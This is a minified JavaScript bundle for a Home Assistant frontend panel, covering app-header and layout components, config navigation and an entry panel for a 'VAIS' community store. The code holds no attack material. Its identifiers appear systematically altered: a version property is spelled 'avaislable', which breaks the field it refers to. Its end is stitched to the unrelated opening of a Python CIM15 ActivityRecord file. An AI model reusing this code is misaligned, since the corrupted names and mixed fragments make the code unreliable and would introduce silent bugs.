e=this._interestedResizables.indexOf(t);e>-1&&(this._interestedResizables.splice(e,1),this._unsubscribeIronResize(t))},_subscribeIronResize:function(t){t.addEventListener("iron-resize",this._boundOnDescendantIronResize)},_unsubscribeIronResize:function(t){t.removeEventListener("iron-resize",this._boundOnDescendantIronResize)},resizerShouldNotify:function(t){return!0},_onDescendantIronResize:function(e){this._notifyingDescendant?e.stopPropagation():t||this._fireResize()},_fireResize:function(){this.fire("iron-resize",null,{node:this,bubbles:!1})},_onIronRequestResizeNotifications:function(t){var i=e(t).rootTarget;i!==this&&(i.assignParentResizable(this),this._notifyDescendant(i),t.stopPropagation())},_parentResizableChanged:function(t){t&&window.removeEventListener("resize",this._boundNotifyResize)},_notifyDescendant:function(t){this.isAttached&&(this._notifyingDescendant=!0,t.notifyResize(),this._notifyingDescendant=!1)},_requestResizeNotifications:function(){if(this.isAttached)if("loading"===document.readyState){var t=this._requestResizeNotifications.bind(this);document.addEventListener("readystatechange",(function e(){document.removeEventListener("readystatechange",e),t()}))}else this._findParent(),this._parentResizable?this._parentResizable._interestedResizables.forEach((function(t){t!==this&&t._findParent()}),this):(D.forEach((function(t){t!==this&&t._findParent()}),this),window.addEventListener("resize",this._boundNotifyResize),this.notifyResize())},_findParent:function(){this.assignParentResizable(null),this.fire("iron-request-resize-notifications",null,{node:this,bubbles:!0,cancelable:!0}),this._parentResizable?D.delete(this):D.add(this)}},{listeners:{"app-reset-layout":"_appResetLayoutHandler","iron-resize":"resetLayout"},attached:function(){this.fire("app-reset-layout")},_appResetLayoutHandler:function(t){e(t).path[0]!==this&&(this.resetLayout(),t.stopPropagation())},_updateLayoutStates:function(){console.error("unimplemented")},resetLayout:function(){var t=this._updateLayoutStates.bind(this);this._layoutDebouncer=i.debounce(this._layoutDebouncer,o,t),s(this._layoutDebouncer),this._notifyDescendantResize()},_notifyLayoutChanged:function(){var t=this;requestAnimationFrame((function(){t.fire("app-reset-layout")}))},_notifyDescendantResize:function(){this.isAttached&&this._interestedResizables.forEach((function(t){this.resizerShouldNotify(t)&&this._notifyDescendant(t)}),this)}}],F={properties:{scrollTarget:{type:HTMLElement,value:function(){return this._defaultScrollTarget}}},observers:["_scrollTargetChanged(scrollTarget, isAttached)"],_shouldHaveListener:!0,_scrollTargetChanged:function(t,i){if(this._oldScrollTarget&&(this._toggleScrollListener(!1,this._oldScrollTarget),this._oldScrollTarget=null),i)if("document"===t)this.scrollTarget=this._doc;else if("string"==typeof t){var o=this.domHost;this.scrollTarget=o&&o.$?o.$[t]:e(this.ownerDocument).querySelector("#"+t)}else this._isValidScrollTarget()&&(this._oldScrollTarget=t,this._toggleScrollListener(this._shouldHaveListener,t))},_scrollHandler:function(){},get _defaultScrollTarget(){return this._doc},get _doc(){return this.ownerDocument.documentElement},get _scrollTop(){return this._isValidScrollTarget()?this.scrollTarget===this._doc?window.pageYOffset:this.scrollTarget.scrollTop:0},get _scrollLeft(){return this._isValidScrollTarget()?this.scrollTarget===this._doc?window.pageXOffset:this.scrollTarget.scrollLeft:0},set _scrollTop(t){this.scrollTarget===this._doc?window.scrollTo(window.pageXOffset,t):this._isValidScrollTarget()&&(this.scrollTarget.scrollTop=t)},set _scrollLeft(t){this.scrollTarget===this._doc?window.scrollTo(t,window.pageYOffset):this._isValidScrollTarget()&&(this.scrollTarget.scrollLeft=t)},scroll:function(t,e){var i;"object"==typeof t?(i=t.left,e=t.top):i=t,i=i||0,e=e||0,this.scrollTarget===this._doc?window.scrollTo(i,e):this._isValidScrollTarget()&&(this.scrollTarget.scrollLeft=i,this.scrollTarget.scrollTop=e)},get _scrollTargetWidth(){return this._isValidScrollTarget()?this.scrollTarget===this._doc?window.innerWidth:this.scrollTarget.offsetWidth:0},get _scrollTargetHeight(){return this._isValidScrollTarget()?this.scrollTarget===this._doc?window.innerHeight:this.scrollTarget.offsetHeight:0},_isValidScrollTarget:function(){return this.scrollTarget instanceof HTMLElement},_toggleScrollListener:function(t,e){var i=e===this._doc?window:e;t?this._boundScrollHandler||(this._boundScrollHandler=this._scrollHandler.bind(this),i.addEventListener("scroll",this._boundScrollHandler)):this._boundScrollHandler&&(i.removeEventListener("scroll",this._boundScrollHandler),this._boundScrollHandler=null)},toggleScrollListener:function(t){this._shouldHaveListener=t,this._toggleScrollListener(t,this.scrollTarget)}},A={},M=[F,{properties:{effects:{type:String},effectsConfig:{type:Object,value:function(){return{}}},disabled:{type:Boolean,reflectToAttribute:!0,value:!1},threshold:{type:Number,value:0},thresholdTriggered:{type:Boolean,notify:!0,readOnly:!0,reflectToAttribute:!0}},observers:["_effectsChanged(effects, effectsConfig, isAttached)"],_updateScrollState:function(t){},isOnScreen:function(){return!1},isContentBelow:function(){return!1},_effectsRunFn:null,_effects:null,get _clampedScrollTop(){return Math.max(0,this._scrollTop)},attached:function(){this._scrollStateChanged()},detached:function(){this._tearDownEffects()},createEffect:function(t,e){var i=A[t];if(!i)throw new ReferenceError(this._getUndefinedMsg(t));var o=this._boundEffect(i,e||{});return o.setUp(),o},_effectsChanged:function(t,e,i){this._tearDownEffects(),t&&i&&(t.split(" ").forEach((function(t){var i;""!==t&&((i=A[t])?this._effects.push(this._boundEffect(i,e[t])):console.warn(this._getUndefinedMsg(t)))}),this),this._setUpEffect())},_layoutIfDirty:function(){return this.offsetWidth},_boundEffect:function(t,e){e=e||{};var i=parseFloat(e.startsAt||0),o=parseFloat(e.endsAt||1),s=o-i,n=function(){},a=0===i&&1===o?t.run:function(e,o){t.run.call(this,Math.max(0,(e-i)/s),o)};return{setUp:t.setUp?t.setUp.bind(this,e):n,run:t.run?a.bind(this):n,tearDown:t.tearDown?t.tearDown.bind(this):n}},_setUpEffect:function(){this.isAttached&&this._effects&&(this._effectsRunFn=[],this._effects.forEach((function(t){!1!==t.setUp()&&this._effectsRunFn.push(t.run)}),this))},_tearDownEffects:function(){this._effects&&this._effects.forEach((function(t){t.tearDown()})),this._effectsRunFn=[],this._effects=[]},_runEffects:function(t,e){this._effectsRunFn&&this._effectsRunFn.forEach((function(i){i(t,e)}))},_scrollHandler:function(){this._scrollStateChanged()},_scrollStateChanged:function(){if(!this.disabled){var t=this._clampedScrollTop;this._updateScrollState(t),this.threshold>0&&this._setThresholdTriggered(t>=this.threshold)}},_getDOMRef:function(t){console.warn("_getDOMRef","`"+t+"` is undefined")},_getUndefinedMsg:function(t){return"Scroll effect `"+t+"` is undefined. Did you forget to import app-layout/app-scroll-effects/effects/"+t+".html ?"}}];n({_template:a`
<style>
:host {
position: relative;
display: block;
transition-timing-function: linear;
transition-property: -webkit-transform;
transition-property: transform;
}
:host::before {
position: absolute;
right: 0px;
bottom: -5px;
left: 0px;
width: 100%;
height: 5px;
content: "";
transition: opacity 0.4s;
pointer-events: none;
opacity: 0;
box-shadow: inset 0px 5px 6px -3px rgba(0, 0, 0, 0.4);
will-change: opacity;
@apply --app-header-shadow;
}
:host([shadow])::before {
opacity: 1;
}
#background {
@apply --layout-fit;
overflow: hidden;
}
#backgroundFrontLayer,
#backgroundRearLayer {
@apply --layout-fit;
height: 100%;
pointer-events: none;
background-size: cover;
}
#backgroundFrontLayer {
@apply --app-header-background-front-layer;
}
#backgroundRearLayer {
opacity: 0;
@apply --app-header-background-rear-layer;
}
#contentContainer {
position: relative;
width: 100%;
height: 100%;
}
:host([disabled]),
:host([disabled])::after,
:host([disabled]) #backgroundFrontLayer,
:host([disabled]) #backgroundRearLayer,
/* Silent scrolling should not run CSS transitions */
:host([silent-scroll]),
:host([silent-scroll])::after,
:host([silent-scroll]) #backgroundFrontLayer,
:host([silent-scroll]) #backgroundRearLayer {
transition: none !important;
}
:host([disabled]) ::slotted(app-toolbar:first-of-type),
:host([disabled]) ::slotted([sticky]),
/* Silent scrolling should not run CSS transitions */
:host([silent-scroll]) ::slotted(app-toolbar:first-of-type),
:host([silent-scroll]) ::slotted([sticky]) {
transition: none !important;
}
</style>
<div id="contentContainer">
<slot id="slot"></slot>
</div>
`,is:"app-header",behaviors:[M,H],properties:{condenses:{type:Boolean,value:!1},fixed:{type:Boolean,value:!1},reveals:{type:Boolean,value:!1},shadow:{type:Boolean,reflectToAttribute:!0,value:!1}},observers:["_configChanged(isAttached, condenses, fixed)"],_height:0,_dHeight:0,_stickyElTop:0,_stickyElRef:null,_top:0,_progress:0,_wasScrollingDown:!1,_initScrollTop:0,_initTimestamp:0,_lastTimestamp:0,_lastScrollTop:0,get _maxHeaderTop(){return this.fixed?this._dHeight:this._height+5},get _stickyEl(){if(this._stickyElRef)return this._stickyElRef;for(var t,i=e(this.$.slot).getDistributedNodes(),o=0;t=i[o];o++)if(t.nodeType===Node.ELEMENT_NODE){if(t.hasAttribute("sticky")){this._stickyElRef=t;break}this._stickyElRef||(this._stickyElRef=t)}return this._stickyElRef},_configChanged:function(){this.resetLayout(),this._notifyLayoutChanged()},_updateLayoutStates:function(){if(0!==this.offsetWidth||0!==this.offsetHeight){var t=this._clampedScrollTop,e=0===this._height||0===t,i=this.disabled;this._height=this.offsetHeight,this._stickyElRef=null,this.disabled=!0,e||this._updateScrollState(0,!0),this._mayMove()?this._dHeight=this._stickyEl?this._height-this._stickyEl.offsetHeight:0:this._dHeight=0,this._stickyElTop=this._stickyEl?this._stickyEl.offsetTop:0,this._setUpEffect(),e?this._updateScrollState(t,!0):(this._updateScrollState(this._lastScrollTop,!0),this._layoutIfDirty()),this.disabled=i}},_updateScrollState:function(t,e){if(0!==this._height){var i=0,o=0,s=this._top;this._lastScrollTop;var n=this._maxHeaderTop,a=t-this._lastScrollTop,r=Math.abs(a),l=t>this._lastScrollTop,d=performance.now();if(this._mayMove()&&(o=this._clamp(this.reveals?s+a:t,0,n)),t>=this._dHeight&&(o=this.condenses&&!this.fixed?Math.max(this._dHeight,o):o,this.style.transitionDuration="0ms"),this.reveals&&!this.disabled&&r<100&&((d-this._initTimestamp>300||this._wasScrollingDown!==l)&&(this._initScrollTop=t,this._initTimestamp=d),t>=n))if(Math.abs(this._initScrollTop-t)>30||r>10){l&&t>=n?o=n:!l&&t>=this._dHeight&&(o=this.condenses&&!this.fixed?this._dHeight:0);var c=a/(d-this._lastTimestamp);this.style.transitionDuration=this._clamp((o-s)/c,0,300)+"ms"}else o=this._top;i=0===this._dHeight?t>0?1:0:o/this._dHeight,e||(this._lastScrollTop=t,this._top=o,this._wasScrollingDown=l,this._lastTimestamp=d),(e||i!==this._progress||s!==o||0===t)&&(this._progress=i,this._runEffects(i,o),this._transformHeader(o))}},_mayMove:function(){return this.condenses||!this.fixed},willCondense:function(){return this._dHeight>0&&this.condenses},isOnScreen:function(){return 0!==this._height&&this._top<this._height},isContentBelow:function(){return 0===this._top?this._clampedScrollTop>0:this._clampedScrollTop-this._maxHeaderTop>=0},_transformHeader:function(t){this.translate3d(0,-t+"px",0),this._stickyEl&&this.translate3d(0,this.condenses&&t>=this._stickyElTop?Math.min(t,this._dHeight)-this._stickyElTop+"px":0,0,this._stickyEl)},_clamp:function(t,e,i){return Math.min(i,Math.max(e,t))},_ensureBgContainers:function(){this._bgContainer||(this._bgContainer=document.createElement("div"),this._bgContainer.id="background",this._bgRear=document.createElement("div"),this._bgRear.id="backgroundRearLayer",this._bgContainer.appendChild(this._bgRear),this._bgFront=document.createElement("div"),this._bgFront.id="backgroundFrontLayer",this._bgContainer.appendChild(this._bgFront),e(this.root).insertBefore(this._bgContainer,this.$.contentContainer))},_getDOMRef:function(t){switch(t){case"backgroundFrontLayer":return this._ensureBgContainers(),this._bgFront;case"backgroundRearLayer":return this._ensureBgContainers(),this._bgRear;case"background":return this._ensureBgContainers(),this._bgContainer;case"mainTitle":return e(this).querySelector("[main-title]");case"condensedTitle":return e(this).querySelector("[condensed-title]")}return null},getScrollState:function(){return{progress:this._progress,top:this._top}}}),n({_template:a`
<style>
:host {
display: block;
/**
* Force app-header-layout to have its own stacking context so that its parent can
* control the stacking of it relative to other elements (e.g. app-drawer-layout).
* This could be done using \`isolation: isolate\`, but that's not well supported
* across browsers.
*/
position: relative;
z-index: 0;
}
#wrapper ::slotted([slot=header]) {
@apply --layout-fixed-top;
z-index: 1;
}
#wrapper.initializing ::slotted([slot=header]) {
position: relative;
}
:host([has-scrolling-region]) {
height: 100%;
}
:host([has-scrolling-region]) #wrapper ::slotted([slot=header]) {
position: absolute;
}
:host([has-scrolling-region]) #wrapper.initializing ::slotted([slot=header]) {
position: relative;
}
:host([has-scrolling-region]) #wrapper #contentContainer {
@apply --layout-fit;
overflow-y: auto;
-webkit-overflow-scrolling: touch;
}
:host([has-scrolling-region]) #wrapper.initializing #contentContainer {
position: relative;
}
:host([fullbleed]) {
@apply --layout-vertical;
@apply --layout-fit;
}
:host([fullbleed]) #wrapper,
:host([fullbleed]) #wrapper #contentContainer {
@apply --layout-vertical;
@apply --layout-flex;
}
#contentContainer {
/* Create a stacking context here so that all children appear below the header. */
position: relative;
z-index: 0;
}
@media print {
:host([has-scrolling-region]) #wrapper #contentContainer {
overflow-y: visible;
}
}
</style>
<div id="wrapper" class="initializing">
<slot id="headerSlot" name="header"></slot>
<div id="contentContainer">
<slot></slot>
</div>
</div>
`,is:"app-header-layout",behaviors:[H],properties:{hasScrollingRegion:{type:Boolean,value:!1,reflectToAttribute:!0}},observers:["resetLayout(isAttached, hasScrollingRegion)"],get header(){return e(this.$.headerSlot).getDistributedNodes()[0]},_updateLayoutStates:function(){var t=this.header;if(this.isAttached&&t){this.$.wrapper.classList.remove("initializing"),t.scrollTarget=this.hasScrollingRegion?this.$.contentContainer:this.ownerDocument.documentElement;var e=t.offsetHeight;this.hasScrollingRegion?(t.style.left="",t.style.right=""):requestAnimationFrame(function(){var e=this.getBoundingClientRect(),i=document.documentElement.clientWidth-e.right;t.style.left=e.left+"px",t.style.right=i+"px"}.bind(this));var i=this.$.contentContainer.style;t.fixed&&!t.condenses&&this.hasScrollingRegion?(i.marginTop=e+"px",i.paddingTop=""):(i.paddingTop=e+"px",i.marginTop="")}}});class N extends(customElements.get("app-header-layout")){static get template(){return a`
<style>
:host {
display: block;
/**
* Force app-header-layout to have its own stacking context so that its parent can
* control the stacking of it relative to other elements (e.g. app-drawer-layout).
* This could be done using \`isolation: isolate\`, but that's not well supported
* across browsers.
*/
position: relative;
z-index: 0;
}
#wrapper ::slotted([slot="header"]) {
@apply --layout-fixed-top;
z-index: 1;
}
#wrapper.initializing ::slotted([slot="header"]) {
position: relative;
}
:host([has-scrolling-region]) {
height: 100%;
}
:host([has-scrolling-region]) #wrapper ::slotted([slot="header"]) {
position: absolute;
}
:host([has-scrolling-region])
#wrapper.initializing
::slotted([slot="header"]) {
position: relative;
}
:host([has-scrolling-region]) #wrapper #contentContainer {
@apply --layout-fit;
overflow-y: auto;
-webkit-overflow-scrolling: touch;
}
:host([has-scrolling-region]) #wrapper.initializing #contentContainer {
position: relative;
}
#contentContainer {
/* Create a stacking context here so that all children appear below the header. */
position: relative;
z-index: 0;
/* Using 'transform' will cause 'position: fixed' elements to behave like
'position: absolute' relative to this element. */
transform: translate(0);
margin-left: env(safe-area-inset-left);
margin-right: env(safe-area-inset-right);
}
@media print {
:host([has-scrolling-region]) #wrapper #contentContainer {
overflow-y: visible;
}
}
</style>
<div id="wrapper" class="initializing">
<slot id="headerSlot" name="header"></slot>
<div id="contentContainer"><slot></slot></div>
<slot id="fab" name="fab"></slot>
</div>
`}}customElements.define("ha-app-layout",N);const B=document.createElement("template");B.setAttribute("style","display: none;"),B.innerHTML="<dom-module id=\"paper-item-shared-styles\">\n <template>\n <style>\n :host, .paper-item {\n display: block;\n position: relative;\n min-height: var(--paper-item-min-height, 48px);\n padding: 0px 16px;\n }\n\n .paper-item {\n @apply --paper-font-subhead;\n border:none;\n outline: none;\n background: white;\n width: 100%;\n text-align: left;\n }\n\n :host([hidden]), .paper-item[hidden] {\n display: none !important;\n }\n\n :host(.iron-selected), .paper-item.iron-selected {\n font-weight: var(--paper-item-selected-weight, bold);\n\n @apply --paper-item-selected;\n }\n\n :host([disabled]), .paper-item[disabled] {\n color: var(--paper-item-disabled-color, var(--disabled-text-color));\n\n @apply --paper-item-disabled;\n }\n\n :host(:focus), .paper-item:focus {\n position: relative;\n outline: 0;\n\n @apply --paper-item-focused;\n }\n\n :host(:focus):before, .paper-item:focus:before {\n @apply --layout-fit;\n\n background: currentColor;\n content: '';\n opacity: var(--dark-divider-opacity);\n pointer-events: none;\n\n @apply --paper-item-focused-before;\n }\n </style>\n </template>\n</dom-module>",document.head.appendChild(B.content);n({_template:a`
<style include="paper-item-shared-styles"></style>
<style>
:host {
@apply --layout-horizontal;
@apply --layout-center;
@apply --paper-font-subhead;
@apply --paper-item;
@apply --paper-icon-item;
}
.content-icon {
@apply --layout-horizontal;
@apply --layout-center;
width: var(--paper-item-icon-width, 56px);
@apply --paper-item-icon;
}
</style>
<div id="contentIcon" class="content-icon">
<slot name="item-icon"></slot>
</div>
<slot></slot>
`,is:"paper-icon-item",behaviors:[[E,C,{hostAttributes:{role:"option",tabindex:"0"}}]]});const I=(t,e)=>e.component?S(t,e.component):!e.components||e.components.some((e=>S(t,e))),O=t=>t.core,W=(t,e)=>(t=>t.advancedOnly)(e)&&!(t=>{var e;return null===(e=t.userData)||void 0===e?void 0:e.showAdvanced})(t);customElements.define("ha-icon-next",class extends r{connectedCallback(){super.connectedCallback(),setTimeout((()=>{this.path="ltr"===window.getComputedStyle(this).direction?l:d}),100)}}),c([g("ha-config-navigation")],(function(t,e){return{F:class extends e{constructor(...e){super(...e),t(this)}},d:[{kind:"field",decorators:[p({attribute:!1})],key:"hass",value:void 0},{kind:"field",decorators:[p({type:Boolean})],key:"narrow",value:void 0},{kind:"field",decorators:[p()],key:"showAdvanced",value:void 0},{kind:"field",decorators:[p()],key:"pages",value:void 0},{kind:"method",key:"render",value:function(){return u`
${this.pages.map((t=>{var e;return("#external-app-configuration"===t.path?null===(e=this.hass.auth.external)||void 0===e?void 0:e.config.hasSettingsScreen:((t,e)=>(O(e)||I(t,e))&&!W(t,e))(this.hass,t))?u`
<a href=${t.path} role="option" tabindex="-1">
<paper-icon-item @click=${this._entryClicked}>
<div
class=${t.iconColor?"icon-background":""}
slot="item-icon"
.style="background-color: ${t.iconColor||"undefined"}"
>
<ha-svg-icon .path=${t.iconPath}></ha-svg-icon>
</div>
<paper-item-body two-line>
${t.name||this.hass.localize(`ui.panel.config.dashboard.${t.translationKey}.title`)}
${"cloud"===t.component&&t.info?t.info.logged_in?u`
<div secondary>
${this.hass.localize("ui.panel.config.cloud.description_login","email",t.info.email)}
</div>
`:u`
<div secondary>
${this.hass.localize("ui.panel.config.cloud.description_features")}
</div>
`:u`
<div secondary>
${t.description||this.hass.localize(`ui.panel.config.dashboard.${t.translationKey}.description`)}
</div>
`}
</paper-item-body>
${this.narrow?"":u`<ha-icon-next></ha-icon-next>`}
</paper-icon-item>
</a>
`:""}))}
`}},{kind:"method",key:"_entryClicked",value:function(t){t.currentTarget.blur(),t.currentTarget.parentElement.href.endsWith("#external-app-configuration")&&(t.preventDefault(),this.hass.auth.external.fireMessage({type:"config_screen/show"}))}},{kind:"get",static:!0,key:"styles",value:function(){return f`
a {
text-decoration: none;
color: var(--primary-text-color);
position: relative;
display: block;
outline: 0;
}
ha-svg-icon,
ha-icon-next {
color: var(--secondary-text-color);
height: 24px;
width: 24px;
}
ha-svg-icon {
padding: 8px;
}
.iron-selected paper-item::before,
a:not(.iron-selected):focus::before {
position: absolute;
top: 0;
right: 0;
bottom: 0;
left: 0;
pointer-events: none;
content: "";
transition: opacity 15ms linear;
will-change: opacity;
}
a:not(.iron-selected):focus::before {
background-color: currentColor;
opacity: var(--dark-divider-opacity);
}
.iron-selected paper-item:focus::before,
.iron-selected:focus paper-item::before {
opacity: 0.2;
}
.icon-background {
border-radius: 20%;
}
.icon-background ha-svg-icon {
color: #fff;
}
`}}]}}),h),c([g("ha-config-section")],(function(t,e){return{F:class extends e{constructor(...e){super(...e),t(this)}},d:[{kind:"field",decorators:[p()],key:"isWide",value:()=>!1},{kind:"field",decorators:[p({type:Boolean})],key:"vertical",value:()=>!1},{kind:"field",decorators:[p({type:Boolean,attribute:"full-width"})],key:"fullWidth",value:()=>!1},{kind:"method",key:"render",value:function(){return u`
<div
class="content ${v({narrow:!this.isWide,"full-width":this.fullWidth})}"
>
<div class="header"><slot name="header"></slot></div>
<div
class="together layout ${v({narrow:!this.isWide,vertical:this.vertical||!this.isWide,horizontal:!this.vertical&&this.isWide})}"
>
<div class="intro"><slot name="introduction"></slot></div>
<div class="panel flex-auto"><slot></slot></div>
</div>
</div>
`}},{kind:"get",static:!0,key:"styles",value:function(){return f`
:host {
display: block;
}
.content {
padding: 28px 20px 0;
max-width: 1040px;
margin: 0 auto;
}
.layout {
display: flex;
}
.horizontal {
flex-direction: row;
}
.vertical {
flex-direction: column;
}
.flex-auto {
flex: 1 1 auto;
}
.header {
font-family: var(--paper-font-headline_-_font-family);
-webkit-font-smoothing: var(
--paper-font-headline_-_-webkit-font-smoothing
);
font-size: var(--paper-font-headline_-_font-size);
font-weight: var(--paper-font-headline_-_font-weight);
letter-spacing: var(--paper-font-headline_-_letter-spacing);
line-height: var(--paper-font-headline_-_line-height);
opacity: var(--dark-primary-opacity);
}
.together {
margin-top: 32px;
}
.intro {
font-family: var(--paper-font-subhead_-_font-family);
-webkit-font-smoothing: var(
--paper-font-subhead_-_-webkit-font-smoothing
);
font-weight: var(--paper-font-subhead_-_font-weight);
line-height: var(--paper-font-subhead_-_line-height);
width: 100%;
opacity: var(--dark-primary-opacity);
font-size: 14px;
padding-bottom: 20px;
}
.horizontal .intro {
max-width: 400px;
margin-right: 40px;
}
.panel {
margin-top: -24px;
}
.panel ::slotted(*) {
margin-top: 24px;
display: block;
}
.narrow.content {
max-width: 640px;
}
.narrow .together {
margin-top: 20px;
}
.narrow .intro {
padding-bottom: 20px;
margin-right: 0;
max-width: 500px;
}
.full-width {
padding: 0;
}
.full-width .layout {
flex-direction: column;
}
`}}]}}),h);const j=y(((t,e)=>{var i,o,s;const n=[],a=[],r=[];var l,d;return t.repositories.forEach((e=>{var i;if("pending-restart"===e.status&&r.push(e),t.addedToLovelace(t,e)||a.push(e),e.installed&&null!==(i=t.removed.map((t=>t.repository)))&&void 0!==i&&i.includes(e.full_name)){const i=t.removed.find((t=>t.repository===e.full_name));n.push({name:t.localize("entry.messages.removed_repository",{repository:i.repository}),info:i.reason,severity:"warning",dialog:"remove",repository:e})}})),null!==(i=t.status)&&void 0!==i&&i.startup&&["setup","waiting","startup"].includes(t.status.stage)&&n.push({name:t.localize(`entry.messages.${t.status.stage}.title`),info:t.localize(`entry.messages.${t.status.stage}.content`),severity:"warning"}),null!==(o=t.status)&&void 0!==o&&o.has_pending_tasks&&n.push({name:t.localize("entry.messages.has_pending_tasks.title"),info:t.localize("entry.messages.has_pending_tasks.content"),severity:"warning"}),null!==(s=t.status)&&void 0!==s&&s.disabled?[{name:t.localize("entry.messages.disabled.title"),secondary:t.localize(`entry.messages.disabled.${null===(l=t.status)||void 0===l?void 0:l.disabled_reason}.title`),info:t.localize(`entry.messages.disabled.${null===(d=t.status)||void 0===d?void 0:d.disabled_reason}.description`),severity:"error"}]:(a.length>0&&n.push({name:t.localize("entry.messages.resources.title"),info:t.localize("entry.messages.resources.content",{number:a.length}),severity:"error"}),r.length>0&&n.push({name:t.localize("entry.messages.restart.title"),path:e?"/_my_redirect/server_controls":void 0,info:t.localize("entry.messages.restart.content",{number:r.length,pluralWording:1===r.length?t.localize("common.integration"):t.localize("common.integration_plural")}),severity:"error"}),n)}));let U=c([g("vais-entry-panel")],(function(t,e){return{F:class extends e{constructor(...e){super(...e),t(this)}},d:[{kind:"field",decorators:[p({attribute:!1})],key:"vais",value:void 0},{kind:"field",decorators:[p({attribute:!1})],key:"hass",value:void 0},{kind:"field",decorators:[p({attribute:!1})],key:"route",value:void 0},{kind:"field",decorators:[p({type:Boolean,reflect:!0})],key:"narrow",value:void 0},{kind:"field",decorators:[p({type:Boolean})],key:"isWide",value:void 0},{kind:"method",key:"render",value:function(){var t,e;const i=[],o=[],s=j(this.vais,S(this.hass,"my"));return this.vais.repositories.forEach((t=>{t.pending_upgrade&&i.push(t)})),s.forEach((t=>{o.push({iconPath:m,name:t.name,info:t.info,secondary:t.secondary,path:t.path||"",severity:t.severity,dialog:t.dialog,repository:t.repository})})),this.dispatchEvent(new CustomEvent("update-vais",{detail:{messages:o,updates:i},bubbles:!0,composed:!0})),u`
<ha-app-layout>
<app-header fixed slot="header">
<app-toolbar>
<ha-menu-button .hass=${this.hass} .narrow=${this.narrow}></ha-menu-button>
<div main-title>${this.narrow?"VAIS":"Home Assistant Community Store"}</div>
</app-toolbar>
</app-header>
<ha-config-section .narrow=${this.narrow} .isWide=${this.isWide} full-width>
${0!==(null===(t=this.vais.messages)||void 0===t?void 0:t.length)?this.vais.messages.map((t=>u`
<ha-alert
.alertType=${t.severity}
.title=${t.secondary?`${t.name} - ${t.secondary}`:t.name}
.rtl=${R(this.hass)}
>
${t.info}
<mwc-button
slot="action"
.label=${t.path?this.vais.localize("common.navigate"):t.dialog?this.vais.localize("common.show"):""}
@click=${()=>t.path?_(t.path):this._openDialog(t)}
>
</mwc-button>
</ha-alert>
`)):(this.narrow,"")}
${0!==(null===(e=this.vais.updates)||void 0===e?void 0:e.length)?u` <ha-card outlined>
<div class="title">${this.vais.localize("common.updates")}</div>
${b(this.vais.updates).map((t=>u`
<div class="list-item" @click=${()=>this._openUpdateDialog(t)}>
<div class="list-item-icon">
${"integration"===t.category?u`
<img
loading="lazy"
.src=${$({domain:t.domain,darkOptimized:this.hass.themes.darkMode,type:"icon"})}
referrerpolicy="no-referrer"
@error=${this._onImageError}
@load=${this._onImageLoad}
/>
`:u`
<ha-svg-icon
path="${w}"
style="padding-left: 0; height: 40px; width: 40px;"
>
</ha-svg-icon>
`}
</div>
<div class="list-item-content">
<div class="list-item-header">${t.name}</div>
<div class="list-item-description">
${this.vais.localize("sections.pending_repository_upgrade",{downloaded:t.installed_version,avaislable:t.avaislable_version})}
</div>
</div>
${this.narrow?"":u`<ha-icon-next></ha-icon-next>`}
</div>
`))}
</ha-card>`:""}
<ha-card outlined>
<ha-config-navigation
.hass=${this.hass}
.pages=${this.vais.sections}
.narrow=${this.narrow}
>
</ha-config-navigation>
${S(this.hass,"hassio")?u`
<div class="list-item" @click=${this._openSupervisorDialog}>
<div class="list-item-icon">
<div class="icon-background" style="background-color: rgb(64, 132, 205)">
<ha-svg-icon .path=${k}></ha-svg-icon>
</div>
</div>
<div class="list-item-content">
<div class="list-item-header">
${this.vais.localize("sections.addon.title")}
</div>
<div class="list-item-description">
${this.vais.localize("sections.addon.description")}
</div>
</div>
</div>
`:""}
<div class="list-item" @click=${this._openAboutDialog}>
<div class="list-item-icon">
<div class="icon-background" style="background-color: rgb(74, 89, 99)">
<ha-svg-icon .path=${x}></ha-svg-icon>
</div>
</div>
<div class="list-item-content">
<div class="list-item-header">${this.vais.localize("sections.about.title")}</div>
<div class="list-item-description">
${this.vais.localize("sections.about.description")}
</div>
</div>
</div>
</ha-card>
</ha-config-section>
</ha-app-layout>
`}},{kind:"method",key:"_onImageLoad",value:function(t){t.target.style.visibility="initial"}},{kind:"method",key:"_onImageError",value:function(t){t.target&&(t.target.outerHTML=`\n <div slot="item-icon" class="icon-background">\n <ha-svg-icon path="${w}" style="padding-left: 0; height: 40px; width: 40px;"></ha-svg-icon>\n </div>`)}},{kind:"method",key:"_openDialog",value:function(t){t.dialog&&("remove"==t.dialog&&(t.dialog="removed"),this.dispatchEvent(new CustomEvent("vais-dialog",{detail:{type:t.dialog,repository:t.repository},bubbles:!0,composed:!0})))}},{kind:"method",key:"_openUpdateDialog",value:function(t){this.dispatchEvent(new CustomEvent("vais-dialog",{detail:{type:"update",repository:t.id},bubbles:!0,composed:!0}))}},{kind:"method",key:"_openAboutDialog",value:async function(){L(this,this.vais)}},{kind:"method",key:"_openSupervisorDialog",value:async function(){this.dispatchEvent(new CustomEvent("vais-dialog",{detail:{type:"navigate",path:"/hassio"},bubbles:!0,composed:!0}))}},{kind:"get",static:!0,key:"styles",value:function(){return[z,T,f`
:host(:not([narrow])) ha-card:last-child {
margin-bottom: 24px;
}
ha-config-section {
margin: -16px auto auto;
max-width: 600px;
color: var(--secondary-text-color);
}
ha-card {
overflow: hidden;
}
ha-card a {
text-decoration: none;
color: var(--primary-text-color);
}
.title {
font-size: 16px;
padding: 16px;
padding-bottom: 0;
}
:host([narrow]) ha-card {
border-radius: 0;
box-shadow: unset;
}
:host([narrow]) ha-config-section {
margin-top: -42px;
}
.icon-background {
border-radius: 50%;
}
.icon-background ha-svg-icon {
color: #fff;
}
.title {
font-size: 16px;
padding: 16px;
padding-bottom: 0;
}
ha-svg-icon,
ha-icon-next {
color: var(--secondary-text-color);
height: 24px;
width: 24px;
}
ha-svg-icon {
padding: 8px;
}
.list-item-icon > * {
height: 40px;
width: 40px;
padding: 0;
}
img {
border-radius: 50%;
}
.list-item {
width: 100%;
cursor: pointer;
display: flex;
padding: 16px;
}
.list-item-icon {
margin-right: 16px;
}
.list-item-header {
font-size: 16px;
}
.list-item-description {
color: var(--secondary-text-color);
margin-right: 16px;
}
.list-item ha-icon-next,
.list-item ha-svg-icon[right] {
right: 0;
padding: 16px;
position: absolute;
}
`]}}]}}),h);export{U as VaisEntryPanel}; | PypiClean |
/PyCIM-15.15.0.tar.gz/PyCIM-15.15.0/CIM15/IEC61968/Common/ActivityRecord.py |
from CIM15.IEC61970.Core.IdentifiedObject import IdentifiedObject
class ActivityRecord(IdentifiedObject):
